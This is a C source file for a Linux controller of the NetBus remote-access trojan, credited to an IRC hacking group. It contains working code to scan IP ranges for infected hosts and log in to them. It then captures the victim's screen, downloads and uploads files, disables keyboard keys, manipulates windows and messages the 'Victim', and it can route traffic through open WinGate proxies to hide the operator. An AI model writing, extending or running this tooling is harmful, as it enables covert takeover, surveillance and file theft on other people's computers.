/*
 * lxnbfunc.c, part of the Linux NetBus Client, by noupe @ #hack.se/efnet
 *
 * Greets to Creed, Happy-H, _preD, r1bbe, peltier, ppz
 * and everyone else on #hack.se/efnet
 *
 */

#include "lxnetbus.h"


int netbusLogin(void)
{
  char *p, str[BUFSIZE], password[BUFSIZE];
  int i;

  memset(str, 0, BUFSIZE); 
  if(read(netbus_sock, str, BUFSIZE) == -1) 
    return -1;

  if((p = strchr(str,'\n')))
    *p = '\0';
 
  strcpy(netbusServer, str);
  if((p = strstr(netbusServer, "x")) != NULL)
    *p = '\0';
  else
    return 1;
  
  printf("Enter netbus server password: ");
  fgets(password, BUFSIZE, stdin);
  if((p = strchr(password, '\n')))
    *p = '\0';

  if(strlen(password) == 0)
    sprintf(str, "%s;1;\r\n", PASSWORD);
  else
    sprintf(str, "%s;%d;%s\r\n", PASSWORD, 0, password);

  write(netbus_sock, str, strlen(str));
  memset(str, 0, BUFSIZE);
  read(netbus_sock, str, BUFSIZE);
  if(strstr(str, "Access;"))
  {
     for(i = 0;i < strlen(str);i++)
       if(str[i] == ';')
         break;

     if(i < strlen(str))
     {
        if(str[i+1] == '1')
          return 1;
        else
        {
          sprintf(statusMsg, "Can't login, bad password");
          return 0;
        }
     }

     return -1;
  }
  else
  {
    printf("Hmm... Received unexpected information...Hit [enter]\n");
    fgets(str, BUFSIZE, stdin);
    return 1;
  }

  return -1;
}


int netbusStdStr(char *type, char *txt)
{
  char str[BUFSIZE]; 

  sprintf(str, "%s;%s\r\n", type, txt); 
  return write(netbus_sock, str, strlen(str)); 
}


int netbusStdInt(char *type, int foobar)
{
  char str[BUFSIZE]; 

  sprintf(str, "%s;%d\r\n", type, foobar); 
  return write(netbus_sock, str, strlen(str)); 
}


int netbusSendMessage(char *txt, char *type, int callback)
{
  char *p, str[BUFSIZE];
  
  sprintf(str, "%s;%d;%s%s\r\n", SENDMSG, callback, txt, type); 
  if(write(netbus_sock, str, strlen(str)) == -1)
    return -1;

  printf("Sent msg... Waiting for response...\n");
  memset(str, 0, BUFSIZE);
  read(netbus_sock, str, BUFSIZE);
  p = strchr(str, ';') + 1;
  if(strstr(str, "Answer;"))
    printf("%s\n", p);
  else if(strstr(str,"Msg;"))
    printf("Victim answered:\n%s\n", p);
  else
    printf("Hmm... Received unexpected information...\n");

  printf("Hit [enter]");
  fgets(str, BUFSIZE, stdin);
  return 1;  
}


int netbusSetMousePos(void)
{
  char str[BUFSIZE];
  int x,y;

  printf("Enter mouse x pos: ");
  fgets(str, BUFSIZE, stdin);
  x = atoi(str);
  printf("Enter mouse y pos: ");
  fgets(str, BUFSIZE, stdin);
  y = atoi(str);
  sprintf(statusMsg, "Mouse pos set to: x:%d y:%d", x, y);

  sprintf(str, "%s;%d;%d\r\n", SETMOUSEPOS, x, y);
  return write(netbus_sock, str, strlen(str));
}


int netbusGetInfo(void)
{
  char *p, str[BUFSIZE];

  sprintf(str, "%s\r\n", GETINFO); 
  if(write(netbus_sock, str, strlen(str)) == -1)
    return -1; 

  memset(str, 0 , BUFSIZE);
  if(read(netbus_sock, str, BUFSIZE) == -1)
    return -1;

  if((p = strstr(str, "Info;")) == NULL)
  {
    printf("Hmm... Received unexpected information...Hit [enter]\n");
    fgets(str, BUFSIZE, stdin);
    return 1;
  }

  while((p = strchr(p, '|')) != NULL)
    *p = '\n';

  for(p = str;*p != ';';p++);
  printf("Server Info:\n");
  printf("Server: %s\n", netbusServer);
  printf("%s\n", p+1);
  printf("Hit [enter]\n");
  fgets(str, BUFSIZE, stdin);

  return 1;
}


int netbusDisableKeys(int state)
{
  char *p, str[BUFSIZE]; 

  if(state)
  {
    printf("Enter keys to disable: ");
    fgets(disabledKeys, BUFSIZE, stdin);
    if((p = strchr(disabledKeys, '\n')))
      *p = '\0';

    sprintf(statusMsg, "Disabled some keys");
    sprintf(str, "%s;%d;%s\r\n", DISABLEKEYS, state, disabledKeys);
  }
  else
  {
    sprintf(str, "%s;0;\r\n", DISABLEKEYS);
    sprintf(statusMsg, "Restored keys");
    memset(disabledKeys, 0, BUFSIZE);
  }

  return write(netbus_sock, str, strlen(str));
}


int netbusGetApps(void)
{
  char *p, *tmpstr, str[BUFSIZE];
  int mem;
  APPLIST *pal = al_root;

  sprintf(str, "%s\r\n", GETAPPS);
  if(write(netbus_sock,str,strlen(str)) == -1)
    return -1;

  memset(str, 0 , BUFSIZE);
  if(read(netbus_sock, str, BUFSIZE) == -1)
    return -1;

  if((p = strstr(str, "AppNames")) == NULL)
  {
    printf("Hmm... Received unexpected information...Hit [enter]\n");
    fgets(str, BUFSIZE, stdin);
    return 1;
  }
  
  while((p = strchr(p, '|')) != NULL)
    *p = '\n';

  for(p = str;*p != ';';p++);
  printf("Running apps (window list):\n"
         "%s\n", p+1);
  freeapplist();
  while(1)
  {
    tmpstr = ++p;
    for(mem = 1;*p != '\n' && *p != '\0';p++, mem++);
    if(*p == '\n')
      *p = '\0';
    else
      break; /* Reached end of string */

    if(!al_root)
      al_root = pal = (APPLIST*) calloc(1, sizeof(APPLIST));
    else
    {
      pal->next = (APPLIST*) calloc(1, sizeof(APPLIST));
      pal = pal->next;
    }

    if(!pal)
      exit(1);

    pal->next = NULL;
    pal->app = (char*) calloc(mem, sizeof(char));
    if(!pal->app)
      exit(1);

    strcpy(pal->app, tmpstr);
  }

  printf("Hit [enter]\n");
  fgets(str, BUFSIZE, stdin);
  return 1;
}


int netbusWinFuck(char *action, char *cmd)
{
  char str[BUFSIZE];
  int i=0, x;
  APPLIST *pal = al_root;
 
  if(!pal)
  {
    sprintf(statusMsg, "Choose '1' to refresh window list.");
    return 1;
  }  

  do
  {
    printf("(%d) %s\n", i, pal->app);
    i++;
  } while((pal = pal->next) != NULL);

  printf("Enter window to %s: ", action);
  fgets(str, BUFSIZE, stdin);
  if((x = atoi(str)) > i)
  {
    printf("Window %d is not in the list\n"
           "Hit [enter]", x);
    fgets(str, BUFSIZE, stdin);
    return 1;
  }

  for(i = 0, pal = al_root;i < x;i++)
    pal = pal->next;

  sprintf(statusMsg, "Window %s: win #%d", action, x);
  sprintf(str, "%s;%s\r\n", cmd, pal->app);
  return write(netbus_sock, str, strlen(str));
}


int netbusGetDisks(void)
{
  char *p, str[BUFSIZE];
  long len = -1;
  
  sprintf(str, "%s\r\n", GETDISKS);
  if(write(netbus_sock, str, strlen(str)) == -1)
    return -1;

  while(stat(netbus_sock))
  {
    memset(str, 0, BUFSIZE);
    len = read(netbus_sock, str, BUFSIZE);
    if(len == -1)
      return -1;

    if(strstr(str, DISKSDONE))
      break;
  }

  if(strstr(str, DISKSDONE) == NULL)
  {
    printf("Received unexpected information. Hit [enter]\n");
    fgets(str, BUFSIZE, stdin);
    return 1;
  }

  p = strchr(str, ';');
  len = atol(p+1);
  printf("Downloading remote filesystem info... %ld bytes.\n", len);
  if(netbusInetDump(DISKDUMPFILE, len) != -1)
    sprintf(statusMsg, "Dumped remote disks to %s", DISKDUMPFILE);
  else
    sprintf(statusMsg, "Unknown error");

  return 1;
}


int netbusUploadFile(void)
{
  char *file, *p, *target, str[BUFSIZE];
  int hold = 0, servsock;
  long len, readbytes, totlen;
  FILE *fd;
  
  printf("Enter full path to file: ");
  fgets(str, sizeof(str), stdin);
  if((p = strchr(str,'\n')) != NULL)
    *p = '\0';

  if((fd = fopen(str, "rb")) == NULL)
  {
    sprintf(statusMsg, "Can't open that file for reading");
    return 1;
  }

  for(p = str + strlen(str);p != &str[0];p--)
    if(*p == '/')
      break;
  
  file = strdup((*p == '/')? p+1: p);
  fseek(fd, 0, SEEK_END);
  len = totlen = ftell(fd);
  fseek(fd, 0, SEEK_SET);
  printf("Enter full remote path (i.e.: c:\\windows): ");
  fgets(str, sizeof(str), stdin);
  if((p = strchr(str,'\n')) != NULL)
    *p = '\0';

  target = strdup(str);
  sprintf(str, "%s;%s;%ld;%s\r\n", UPLOADFILE, file, len, target);
  if(write(netbus_sock, str, strlen(str)) == -1)
    return -1;

  memset(str, 0, sizeof(str));
  while(stat(netbus_sock))
  {
    read(netbus_sock, str, BUFSIZE);
    if(strstr(str, UPLOADREADY) != NULL)
      break;
  }

  if(strstr(str, UPLOADREADY) == NULL)
  {
    sprintf(statusMsg, "Can't upload file, unknown error");
    return 1;
  }

  if((servsock = nbconnect(remoteHost, NETBUSPORT+1, wingateproxy)) == -1)
    return -1;

  printf("Uploading file '%s' (%ld bytes) to '%s'... .\n", file, len, target);
  while(!feof(fd))
  {
    readbytes = fread(str, 1, BUFSIZE, fd);
    len -= readbytes;
    write(servsock, str, readbytes);
    if(hold != ((totlen - len)/(totlen/100)))
    {
      hold = (totlen - len)/(totlen/100);
      printf("%d%% sent\n", hold);
    }
  }
 
  sprintf(statusMsg, "Sent file (%s)", file);
  fclose(fd);
  free(file);
  free(target);

  return 1;
}


int netbusDownloadFile(void)
{
  char *p, file[0xff], str[BUFSIZE];
  long len;
  
  printf("Enter full path to file: ");
  fgets(file, sizeof(file), stdin);
  if((p = strchr(file,'\n')) != NULL)
    *p = '\0';

  sprintf(str, "%s;%s\r\n", DOWNLOADFILE, file);
  if(write(netbus_sock, str, strlen(str)) == -1)
    return -1;

  while(stat(netbus_sock))
  {
    memset(str, 0, BUFSIZE);
    len = read(netbus_sock, str, BUFSIZE);
    if(len == -1)
      return -1;
  
    if(strstr(str, DOWNLOADREADY))
    {
      if(strstr(str, ";1;"))
        break; 
      if(strstr(str, ";0"))
      {
        sprintf(statusMsg, "Can't download file, unknown error...");
        return 1;
      }
    }
  }

  if(strstr(str, DOWNLOADREADY) == NULL)
  {
    printf("Received no or unexpected information. Hit [enter]\n");
    fgets(str, BUFSIZE, stdin);
    return 1;
  }

  p = strchr(str, ';');
  len = atol(p+3);
  for(p = file + strlen(file);p != &file[0];p--)
    if(*p == '\\')
      break;

  p += (*p == '\\')? 1: 0;
  printf("Downloading remote file (%s)... %ld bytes.\n", file, len);
  if(netbusInetDump(p, len) != -1)
    sprintf(statusMsg, "Dumped remote file (%s)", p);
  else
    sprintf(statusMsg, "Unknown error");

  return 1;
}


int netbusCaptureScreen(void)
{
  char *p, str[BUFSIZE];
  long len;
  
  sprintf(str, "%s\r\n", CAPTURESCREEN);
  if(write(netbus_sock, str, strlen(str)) == -1)
    return -1;

  printf("Capturing remote screen... ");
  while(stat(netbus_sock))
  {
    memset(str, 0, BUFSIZE);
    len = read(netbus_sock, str, BUFSIZE);
    if(len == -1)
      return -1;

    if(strstr(str, CAPTUREREADY) && strstr(str, ";1;"))
      break;
  }

  if(strstr(str, CAPTUREREADY) == NULL)
  {
    printf("Received unexpected information. Hit [enter]\n");
    fgets(str, BUFSIZE, stdin);
    return 1;
  }

  p = strchr(str, ';');
  len = atol(p+3);
  printf("%ld bytes.\n", len);
  if(netbusInetDump(SCREENDUMPFILE, len) != -1)
    sprintf(statusMsg, "Dumped remote screen to %s", SCREENDUMPFILE);
  else
    sprintf(statusMsg, "Unknown error");

  return 1;
}


int netbusInetDump(char *fname, long totlen)
{
  char str[BUFSIZE];
  int dumpsock, hold = 0;
  long bytesread, len = totlen;
  FILE *fd;

  if((dumpsock = nbconnect(remoteHost, NETBUSPORT+1, wingateproxy)) == -1)
    return -1;

  if((fd = fopen(fname, "wb")) == NULL)
  {
    printf("Unable to open '%s' for writing. Hit [enter]\n", fname);
    fgets(str, BUFSIZE, stdin);
    return -1;
  }

  while(len > 0)
  {
    bytesread = read(dumpsock, str, BUFSIZE);
    len -= bytesread;
    fwrite(str, 1, bytesread, fd);
    if(hold != ((totlen - len)/(totlen/100)))
    {
      hold = (totlen - len)/(totlen/100);
      printf("%d%% received.\n", hold);
    }
  }

  fclose(fd);
  close(dumpsock);

  return 1;
}


int nbconnect(char *target, int port, char *proxy)
{
  int i = 0, sock;
  char str[BUFSIZE];
  struct sockaddr_in sin;
  struct hostent *he;

  sprintf(remoteHost, "%s", target);    
  if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
  {
    sprintf(statusMsg, "socket() failed");
    return -1;
  }
 
  if((he = (struct hostent *)gethostbyname((*proxy)? proxy: target)) == NULL) 
  {
    sprintf(statusMsg, "Unable to lookup host: %s", (*proxy)? proxy: target);
    return -1;
  }
  sin.sin_port = htons(((*proxy)? WGPORT: port));
  sin.sin_family = he->h_addrtype;
  memcpy(&sin.sin_addr.s_addr, he->h_addr, he->h_length);
  if(connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)
  {
    close(sock);
    sprintf(statusMsg, "Connection timeout: %s", ((*proxy)? proxy: target));
    return -1;
  }

  if(*proxy)
  {
    memset(str, 0, BUFSIZE);
    if(stat(sock))
      read(sock, str, BUFSIZE);

    memset(str, 0, BUFSIZE);
    if(stat(sock))
      read(sock, str, BUFSIZE);

    if(strstr(str, "Gate") == NULL)
    {
      sprintf(statusMsg, "Not a wingate (%s)", proxy);
      return -1;
    }

    sprintf(str, "%s %d\r\n", target, port);
    write(sock, str, strlen(str));
    sleep(1);
    read(sock, str, strlen(str)); /* the wingate replies to each character written to it */
    memset(str, 0, BUFSIZE);
    while(stat(sock) && i < BUFSIZE)
    {
      read(sock, str+i, 1);
      if(*(str+i) == '\n')
        break;
      i++;
    }

    if(strstr(str, "Socket Error") || strstr(str, "failed") || !strstr(str, "Connected"))
    {
      sprintf(statusMsg, "WinGate: connection failed");
      close(sock);
      return -1;
    }
  }

  if(*proxy)
    sprintf(statusMsg, "Connected to: %s -> %s", proxy, target);
  else
    sprintf(statusMsg, "Connected to: %s", target);

  return(sock);
}


int stat(int s)
{
  struct timeval tv;
  fd_set fds;
  
  tv.tv_sec = 8;
  tv.tv_usec = 0;
  FD_ZERO(&fds);
  FD_SET(s, &fds);
  return select(s+1, &fds, NULL, NULL, &tv);
}


int nbscan(char *ip, int max, char *proxy)
{
  char *p, str[BUFSIZE];
  int d;

  if(strchr(ip, '.') == NULL)
    return -1;

  for(p = ip+strlen(ip);*p != '.';p--);
  *p = '\0';
  d = atoi(p+1);

  scanning++;
  while(max && scanning)
  {
    sprintf(str, "%s.%d", ip, d);
    printf("trying ip[%s]...\n", str);  
    d++;
    max--;
    netbus_sock = nbconnect(str, NETBUSPORT, proxy);
    if(netbus_sock != -1)
      isConnected++;

    if(isConnected)
    {
      strncpy(ip, str, BUFSIZE);
      return 1;
    }
  }

  sprintf(statusMsg, "Didn't find any vuln. host");
  return -1;
}


int nbreset(void)
{
  isConnected = cdromstatus = scanning =
  mouse_state = keyclick = usewingate = 0;
  memset(statusMsg, 0, BUFSIZE);
  memset(remoteHost, 0, BUFSIZE);
  memset(wingateproxy, 0, BUFSIZE);
  memset(netbusServer, 0, BUFSIZE);
  memset(disabledKeys, 0, BUFSIZE);
  freeapplist();
  pMenu = mainmenu;
  return 1;
}


void nbsighandler(int signo) /* Signal handler */ 
{
  switch(signo)
  {
/*
    case SIGALRM:
      sprintf(statusMsg, "Connection timed out");
      signal(SIGALRM, nbsighandler);
      break;
*/
    case SIGINT:
      if(isConnected)
        close(netbus_sock);
      nbreset();
      signal(SIGINT, nbsighandler);
      break;

    default:
      break;
  }

}


void freeapplist(void)
{
  APPLIST *pal = al_root, *pal2;
  
  if(pal == NULL)
    return;

  while(pal != NULL)
  {
    if(pal->app != NULL);
      free(pal->app);
    pal2 = pal;
    pal = pal->next;
    free(pal2);
  }

  al_root = NULL;
}
